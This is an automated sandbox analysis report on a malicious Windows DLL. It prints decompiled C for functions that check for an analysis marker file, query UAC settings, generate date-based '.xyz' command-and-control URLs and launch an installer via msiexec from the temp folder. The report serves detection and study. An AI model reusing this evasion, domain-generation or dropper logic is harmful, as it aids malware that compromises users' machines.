Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
String ID: gdiview.msi$msiexec.exe /i "%s"
API String ID: 1459467440-729886463
Opcode ID: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
Instruction ID: fc1d18d4907088cb0004c85748b024e0f714aa859ea981698376c8e2dc0c21e3
Opcode Fuzzy Hash: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
Instruction Fuzzy Hash: 431170BAD402186AE750D760EC46FEE7328DB54701F4444A4BB48A5085EBB1A7988F92

Uniqueness

Uniqueness Score: -1.00%

Function 10020575, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E10020575(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t31;
				void* _t35;
				void* _t47;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;

				_t62 = __eflags;
				_t45 = __esi;
				_t44 = __edi;
				_t36 = __ebx;
				E1001FDB0();
				E1001FF90(__ebx, __edi, __esi, __eflags, "install", "user01", "-0.25", "45.0.0", "exe");
				_t51 = _t49 + 0x14 - 0x1c;
				_t37 = _t51;
				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
				E10020180(__ebx, __edi, __esi, _t62);
				_t52 = _t51 + 0x1c;
				if(PathFileExistsA("C:\\hijack") != 0) {
					L7:
					_t53 = _t52 - 0x1c;
					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
					E10020180(_t36, _t44, _t45, __eflags);
					_t55 = _t53 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "user01");
					E1001FEA0(_t36, _t44, _t45, __eflags);
					_t57 = _t55 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "user01");
					E1001FDC0(_t36, _t44, _t45, __eflags);
					_t59 = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
					E10020180(_t36, _t44, _t45, __eflags);
				} else {
					E1001A0A0();
					if(E1001A0B0(_t37) == 0 || E10019D10() != 0) {
					} else {
						_t35 = E1001FA30(_t36, _t44, _t45, __eflags, 0x3e8, 0);
						_t52 = _t52 + 8;
						__eflags = _t35;
						if(__eflags != 0) {
							goto L7;
						} else {
						}
					}
				}
				E1001A260();
				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
				E100011A0(_t47 - 0x28);
				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t31;
			}

0x10020575
0x10020575
0x10020575
0x10020575
0x10020644
0x10020662
0x1002066a
0x1002066d
0x1002066f
0x1002067f
0x10020685
0x1002068a
0x1002069a
0x100206d0
0x100206d0
0x100206d5
0x100206e5
0x100206eb
0x100206f3
0x100206f8
0x10020708
0x1002070e
0x10020716
0x1002071b
0x1002072b
0x10020731
0x10020739
0x1002073e
0x1002074e
0x10020754
0x1002069c
0x1002069c
0x100206a8
0x100206b8
0x100206bf
0x100206c4
0x100206c7
0x100206c9
0x00000000
0x00000000
0x100206cb
0x100206c9
0x100206a8
0x1002075c
0x10020761
0x1002076b
0x10020775
0x1002077a
0x10020783
0x1002078e

APIs

PathFileExistsA.SHLWAPI(C:\hijack), ref: 10020692

Part of subcall function 10019D10: GetSystemDefaultLCID.KERNEL32 ref: 10019D1D

Strings

-0.25, xrefs: 10020653
status=main_start, xrefs: 10020675
C:\hijack, xrefs: 1002068D
45.0.0, xrefs: 1002064E
exe, xrefs: 10020649
install, xrefs: 1002065D
user01, xrefs: 10020658

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: DefaultExistsFilePathSystem
String ID: -0.25$45.0.0$C:\hijack$exe$install$status=main_start$user01
API String ID: 482051434-1656717437
Opcode ID: 0a904efb4324982fc1db73172a1754b2f1969f879e70f59afb907af5123e15f7
Instruction ID: 76c3a66b6cadf2752fd619ea01efa0c867ff815aaebb18d2e7d5061645e6b307
Opcode Fuzzy Hash: 0a904efb4324982fc1db73172a1754b2f1969f879e70f59afb907af5123e15f7
Instruction Fuzzy Hash: 0501F978D083189FD750FFA49C4A7DE77B2DF40254F900198FD0866143EB31B5909E62

Uniqueness

Uniqueness Score: -1.00%

Function 1002185A, Relevance: 13.6, APIs: 9, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1002185A(void* __ebx, void* __edx, void* __edi) {
				void* _t60;
				void* _t80;
				void* _t101;
				void* _t154;
				void* _t156;
				void* _t158;
				void* _t171;

				L0:
				while(1) {
					L0:
					_t150 = __edi;
					_t106 = __ebx;
					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
					_t60 = E100021E0(_t154 - 0xe2a4);
					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
						break;
					}
					L2:
					E1000CF20(__edi, _t154 - 0xab84, 0, 0x3710);
					E1000CF20(_t150, _t154 - 0x3d54, 0, 0x3710);
					_t80 = E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
					_t151 = _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
					E1000D190(__ebx, _t150, _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
					E1000D8A3( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E10003030(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
					E1000CF20(_t150, _t154 - 0xe294, 0, 0x3710);
					E1000CF20(_t150, _t154 - 0x746c, 0, 0x3710);
					E1000CC93(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
					_push(_t154 - 0x3d54);
					_push(_t154 - 0xe294);
					_push( *((intOrPtr*)(_t154 + 8)));
					E1000CC93(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
					_t171 = _t156 + 0x7c;
					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
						E1000D190(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAC0(_t154 - 0x746c));
						_t171 = _t171 + 0x10;
					}
					_t101 = E1000CAC0(_t154 - 0x746c);
					_t156 = _t171 + 4;
					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
				}
				L5:
				 *((char*)(_t154 - 4)) = 1;
				E100011A0(_t154 - 0xe2dc);
				 *((char*)(_t154 - 4)) = 0;
				E10003010(_t154 - 0xe2a4);
				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
				E100011A0(_t154 - 0xe2c0);
				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
				 *((char*)(_t154 - 0x21c)) = 0;
				E1000CF20(__edi, _t154 - 0x21b, 0, 0x1ff);
				_push( *((intOrPtr*)(_t154 - 0x18)));
				_push( *((intOrPtr*)(_t154 + 8)));
				E1000CC93(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
				_t158 = _t156 + 0x20;
				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
					E1000D190(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAC0(_t154 - 0x21c));
					_t158 = _t158 + 0x10;
				}
				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAC0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
				return  *((intOrPtr*)(_t154 - 0x14));
			}

0x1002185a
0x1002185a
0x1002185a
0x1002185a
0x1002185a
0x10021863
0x1002186f
0x10021874
0x1002187a
0x00000000
0x00000000
0x10021880
0x1002188e
0x100218a4
0x100218cb
0x100218ee
0x10021912
0x10021951
0x10021967
0x1002197d
0x1002199a
0x100219a8
0x100219af
0x100219b3
0x100219c6
0x100219cb
0x100219d4
0x100219f6
0x100219fb
0x100219fb
0x10021a05
0x10021a0a
0x10021a10
0x10021a10
0x10021a18
0x10021a18
0x10021a22
0x10021a27
0x10021a31
0x10021a36
0x10021a43
0x10021a48
0x10021a4f
0x10021a64
0x10021a6f
0x10021a73
0x10021a83
0x10021a88
0x10021a91
0x10021ab3
0x10021ab8
0x10021ab8
0x10021acd
0x10021ad6
0x10021ae1

APIs

_memset.LIBCMT ref: 1002188E
_memset.LIBCMT ref: 100218A4
_strcpy_s.LIBCMT ref: 10021951
_memset.LIBCMT ref: 10021967
_memset.LIBCMT ref: 1002197D
_sprintf.LIBCMT ref: 1002199A
_sprintf.LIBCMT ref: 100219C6

Part of subcall function 1000CC93: __output_l.LIBCMT ref: 1000CCE6

_strlen.LIBCMT ref: 100219DD
_strlen.LIBCMT ref: 10021A05
_memset.LIBCMT ref: 10021A64
_sprintf.LIBCMT ref: 10021A83
_strlen.LIBCMT ref: 10021A9A
_strlen.LIBCMT ref: 10021AC2

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
String ID:
API String ID: 3854912713-0
Opcode ID: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
Instruction ID: ecc14f8781584b065d37a28c2fb0b24bdd6a5e60bbd0adb2cb8e7c12e54bf0d8
Opcode Fuzzy Hash: b322046e219f78ca5d588c42d31cd5ab94df7dbf5b27a50053a166c6a7f0d488
Instruction Fuzzy Hash: 3B4192B6D002186BDB14D7A0DC92EEE737DEF54280F0449A9F50DB6246EA747B448BA2

Uniqueness

Uniqueness Score: -1.00%

Function 100223F0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E100223F0(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v36;
				char _v292;
				signed int _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				intOrPtr _v312;
				void* __ebp;
				char _t61;
				char _t62;
				signed int _t70;
				intOrPtr _t102;
				intOrPtr _t103;
				char _t115;
				char _t116;
				signed int _t118;

				_t132 = __esi;
				_t131 = __edi;
				_t101 = __ebx;
				_t61 = "rundll32"; // 0x646e7572
				_v24 = _t61;
				_t102 =  *0x100254e4; // 0x32336c6c
				_v20 = _t102;
				_t115 =  *0x100254e8; // 0x0
				_v16 = _t115;
				_t62 = "explorer"; // 0x6c707865
				_v308 = _t62;
				_t103 =  *0x100254f0; // 0x7265726f
				_v304 = _t103;
				_t116 =  *0x100254f4; // 0x0
				_v300 = _t116;
				E1000CF20(__edi,  &_v292, 0, 0x108);
				E1001F150( &_v24,  &_v292,  &_v24);
				E1000D190(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
				_t118 = _a4;
				_v12 = E1000CAC0(_t118);
				_v296 = 0;
				_t70 = _v12 & 0x80000007;
				if(_t70 < 0) {
					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
				}
				if(_t70 == 0) {
					_t120 = _v12 + 8;
					__eflags = _t120;
					_v296 = _t120;
				} else {
					asm("cdq");
					_t120 = _t118 & 0x00000007;
					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
				}
				_v8 = L1000CE56(_t101, _t120, _t131, _t132, _v296);
				E1000CF20(_t131, _v8, 0, _v296);
				E1000D190(_t101, _t131, _t132, _v8, _a4, E1000CAC0(_a4));
				E1001F0B0(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
				asm("cdq");
				_v312 = L1000CE56(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
				asm("cdq");
				E1000CF20(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
				_t90 = _v296 + 2;
				asm("cdq");
				E1001F240(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
				_push(_v8);
				E1000CA30(_t101, _t131, _t132, _t90 % 3);
				return _v312;
			}

0x100223f0
0x100223f0
0x100223f0
0x100223f9
0x100223fe
0x10022401
0x10022407
0x1002240a
0x10022410
0x10022413
0x10022418
0x1002241e
0x10022424
0x1002242a
0x10022430
0x10022444
0x10022457
0x1002246c
0x10022474
0x10022480
0x10022483
0x10022490
0x10022495
0x1002249b
0x1002249b
0x1002249e
0x100224be
0x100224be
0x100224c1
0x100224a0
0x100224a3
0x100224a4
0x100224b3
0x100224b3
0x100224d6
0x100224e6
0x10022503
0x10022521
0x10022532
0x1002254a
0x10022559
0x10022572
0x1002258b
0x1002258e
0x100225a5
0x100225b0
0x100225b1
0x100225c2

APIs

_memset.LIBCMT ref: 10022444
_strlen.LIBCMT ref: 10022478
_memset.LIBCMT ref: 100224E6
_strlen.LIBCMT ref: 100224F2
_memset.LIBCMT ref: 10022572

Strings

rundll32, xrefs: 100223F9
explorer, xrefs: 10022413

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_strlen
String ID: explorer$rundll32
API String ID: 1975251954-2912785976
Opcode ID: c1e6a0fdb6488fddb4f6070d290b58589a25d59a5c82d9815c184508ac71ae6d
Instruction ID: 8d15330d89fc5d0acd7d9b91591f78a2dd970f15495d3f7c9849200120727594
Opcode Fuzzy Hash: c1e6a0fdb6488fddb4f6070d290b58589a25d59a5c82d9815c184508ac71ae6d
Instruction Fuzzy Hash: 84515FBAD00218ABDB14DB98DC92FEEB3B9EB4C304F044199E50997341E635BB54CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1001DC00, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001DC00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				struct _OSVERSIONINFOW _v284;
				char _v547;
				char _v548;
				char _v819;
				char _v820;
				char _v824;
				void* _t31;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t53;
				void* _t57;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t69 = __esi;
				_t68 = __edi;
				_t57 = __ebx;
				if(_a4 == 0) {
					return _t31;
				}
				_v820 = 0;
				E1000CF20(__edi,  &_v819, 0, 0x103);
				_v548 = 0;
				_t58 =  &_v547;
				E1000CF20(_t68,  &_v547, 0, 0x103);
				_t65 =  &(_v284.dwMajorVersion);
				E1000CF20(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
				_t74 = _t71 + 0x24;
				_v284.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v284);
				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D240() == 0) {
					_t38 = E1001D7E0(_t68,  &_v548);
					_t75 = _t74 + 4;
					__eflags = _t38;
					if(_t38 != 0) {
						L11:
						E1001D2D0(_t58,  &_v548);
						_t65 =  &_v820;
						_t41 = E1001CCF0( &_v820, 0x104,  &_v824);
						_t77 = _t75 + 0x10;
						__eflags = _t41;
						if(_t41 >= 0) {
							_t65 = 0x104 - _v824;
							__eflags = 0x104;
							E1001CC50( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
							_t77 = _t77 + 0xc;
						}
						goto L13;
					}
					_t49 = E1001D560(_t68,  &_v548);
					_t75 = _t75 + 4;
					__eflags = _t49;
					if(_t49 != 0) {
						goto L11;
					}
					_t58 =  &_v548;
					_t50 = E1001DA70(_t68,  &_v548);
					_t75 = _t75 + 4;
					__eflags = _t50;
					if(_t50 != 0) {
						goto L11;
					}
					_t65 =  &_v548;
					_t51 = E1001D370(_t57, _t68, _t69,  &_v548);
					_t77 = _t75 + 4;
					__eflags = _t51;
					if(_t51 == 0) {
						goto L13;
					}
					goto L11;
				} else {
					_t53 = E1001DA70(_t68,  &_v548);
					_t77 = _t74 + 4;
					_t84 = _t53;
					if(_t53 != 0) {
						_t65 =  &_v548;
						E1001D2D0( &_v548,  &_v548);
						E1001D320(_t84,  &_v820,  &_v548);
						_t77 = _t77 + 0xc;
					}
					L13:
					if(_v820 == 0) {
						_t65 =  &_v820;
						E1001CFA0("Mid2Failed", 0x104,  &_v820);
						_t77 = _t77 + 0xc;
					}
					return E1000D8A3(_t65, _a4, 0x104,  &_v820);
				}
			}

0x1001dc00
0x1001dc00
0x1001dc00
0x1001dc0d
0x1001ddb4
0x1001ddb4
0x1001dc13
0x1001dc28
0x1001dc30
0x1001dc3e
0x1001dc45
0x1001dc54
0x1001dc5b
0x1001dc60
0x1001dc63
0x1001dc74
0x1001dc81
0x1001dcd9
0x1001dcde
0x1001dce1
0x1001dce3
0x1001dd1e
0x1001dd25
0x1001dd39
0x1001dd40
0x1001dd45
0x1001dd48
0x1001dd4a
0x1001dd5f
0x1001dd5f
0x1001dd6d
0x1001dd72
0x1001dd72
0x00000000
0x1001dd4a
0x1001dcec
0x1001dcf1
0x1001dcf4
0x1001dcf6
0x00000000
0x00000000
0x1001dcf8
0x1001dcff
0x1001dd04
0x1001dd07
0x1001dd09
0x00000000
0x00000000
0x1001dd0b
0x1001dd12
0x1001dd17
0x1001dd1a
0x1001dd1c
0x00000000
0x00000000
0x00000000
0x1001dc95
0x1001dc9c
0x1001dca1
0x1001dca4
0x1001dca6
0x1001dca8
0x1001dcaf
0x1001dcc5
0x1001dcca
0x1001dcca
0x1001dd75
0x1001dd7e
0x1001dd80
0x1001dd91
0x1001dd96
0x1001dd96
0x00000000
0x1001ddae

APIs

_memset.LIBCMT ref: 1001DC28
_memset.LIBCMT ref: 1001DC45
_memset.LIBCMT ref: 1001DC5B
GetVersionExW.KERNEL32(00000114), ref: 1001DC74
_strcpy_s.LIBCMT ref: 1001DDA9

Part of subcall function 1001D240: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
Part of subcall function 1001D240: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
Part of subcall function 1001D240: RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9

Part of subcall function 1001DA70: wsprintfW.USER32 ref: 1001DABC
Part of subcall function 1001DA70: CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB21
Part of subcall function 1001DA70: DeviceIoControl.KERNEL32 ref: 1001DB50
Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB68
Part of subcall function 1001DA70: CloseHandle.KERNEL32(000000FF), ref: 1001DBB4

Part of subcall function 1001D2D0: _strlen.LIBCMT ref: 1001D2DE

Strings

Mid2Failed, xrefs: 1001DD8C

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$Close$ControlCreateDeviceFileHandleOpenQueryValueVersion_strcpy_s_strlenwsprintf
String ID: Mid2Failed
API String ID: 2934472556-1001836097
Opcode ID: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
Instruction ID: aa707a60008127caf2ce8d05e14bba9426138a7f06fddb79af8b759b423a3348
Opcode Fuzzy Hash: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
Instruction Fuzzy Hash: 224184B5C0021967EB14F7A0AC86FEA737DEB14744F4404A9EA0899142F771FBC8CB92

Uniqueness

Uniqueness Score: -1.00%

Function 100225D0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94
timeCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E100225D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				struct _SYSTEMTIME _v36;
				char _v303;
				char _v304;
				char _v332;
				char _v360;
				char _v388;
				signed int _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				void* __ebp;
				intOrPtr _t91;

				_t97 = __eflags;
				_t89 = __edi;
				_push(0xffffffff);
				_push(E10022A77);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t91;
				_v392 = 0;
				E10001160( &_v332, __eflags, "http://");
				_v8 = 0;
				_v304 = 0;
				E1000CF20(__edi,  &_v303, 0, 0x103);
				_v36.wYear = 0;
				_v36.wMonth = 0;
				_v36.wDay = 0;
				_v36.wMinute = 0;
				_v36.wMilliseconds = 0;
				GetLocalTime( &_v36);
				_push(_v36.wDay & 0x0000ffff);
				_push(_v36.wMonth & 0x0000ffff);
				E1000CC93(_t89,  &_v304, "changenewsys%04d%02d%02d", _v36.wYear & 0x0000ffff);
				_v20 = E1001A480(__ebx, _v36.wYear & 0x0000ffff, _t89, __esi, _t97,  &_v304);
				_v396 = E10001160( &_v360, _t97, _v20);
				_v400 = _v396;
				_v8 = 1;
				E10001A70( &_v332, _v400);
				_v8 = 0;
				E100011A0( &_v360);
				_push(_v20);
				E1000CA30(__ebx, _t89, __esi, _t97);
				_v404 = E10001160( &_v388, _t97, ".xyz/");
				_v408 = _v404;
				_v8 = 2;
				E10001A70( &_v332, _v408);
				_v8 = 0;
				E100011A0( &_v388);
				E10001110(_a4, _t97,  &_v332);
				_v392 = _v392 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v332);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x100225d0
0x100225d0
0x100225d3
0x100225d5
0x100225e0
0x100225e1
0x100225ee
0x10022603
0x10022608
0x1002260f
0x10022624
0x1002262c
0x10022634
0x10022637
0x1002263a
0x1002263d
0x10022645
0x1002264f
0x10022654
0x10022666
0x1002267d
0x1002268f
0x1002269b
0x100226a1
0x100226b2
0x100226b7
0x100226c1
0x100226c9
0x100226ca
0x100226e2
0x100226ee
0x100226f4
0x10022705
0x1002270a
0x10022714
0x10022723
0x10022731
0x10022737
0x10022744
0x1002274f
0x10022759

APIs

_memset.LIBCMT ref: 10022624
GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
_sprintf.LIBCMT ref: 10022666

Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6

Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9

Strings

changenewsys%04d%02d%02d, xrefs: 1002265A
http://, xrefs: 100225F8
.xyz/, xrefs: 100226D2

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastLocalTime___sbh_find_block___sbh_free_block
String ID: .xyz/$changenewsys%04d%02d%02d$http://
API String ID: 984892819-377150047
Opcode ID: 01893e789d72bc6740a2a515bf2c20aba140765a16ad56bf668e112c6c4f99eb
Instruction ID: 81f1802f078645e924587200c16c269d37407c15be22a51fe8bac89201a43415
Opcode Fuzzy Hash: 01893e789d72bc6740a2a515bf2c20aba140765a16ad56bf668e112c6c4f99eb
Instruction Fuzzy Hash: 08412975C04228ABDB14CBA4DC51BEEB7B4EF08744F4081E9F509A7291EB346B84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1001FEA0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E1001FEA0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E10022AF1);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF20(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF20(_t41,  &_v311, 0, 0x103);
				E1001A600(__ebx, _t41, __esi, _t50,  &_v44);
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push("0011");
				_push(E100011E0( &_v44));
				E1000CC93(_t41,  &_v312, "%s%s %s %s",  &_v576);
				E1001A1D0(_t50,  &_v312);
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}

0x1001fea0
0x1001fea0
0x1001fea3
0x1001fea5
0x1001feb0
0x1001feb1
0x1001febe
0x1001fec5
0x1001feda
0x1001fee2
0x1001fef7
0x1001ff03
0x1001ff17
0x1001ff25
0x1001ff26
0x1001ff33
0x1001ff47
0x1001ff56
0x1001ff61
0x1001ff66
0x1001ff70
0x1001ff78
0x1001ff82

APIs

_memset.LIBCMT ref: 1001FEDA
_memset.LIBCMT ref: 1001FEF7

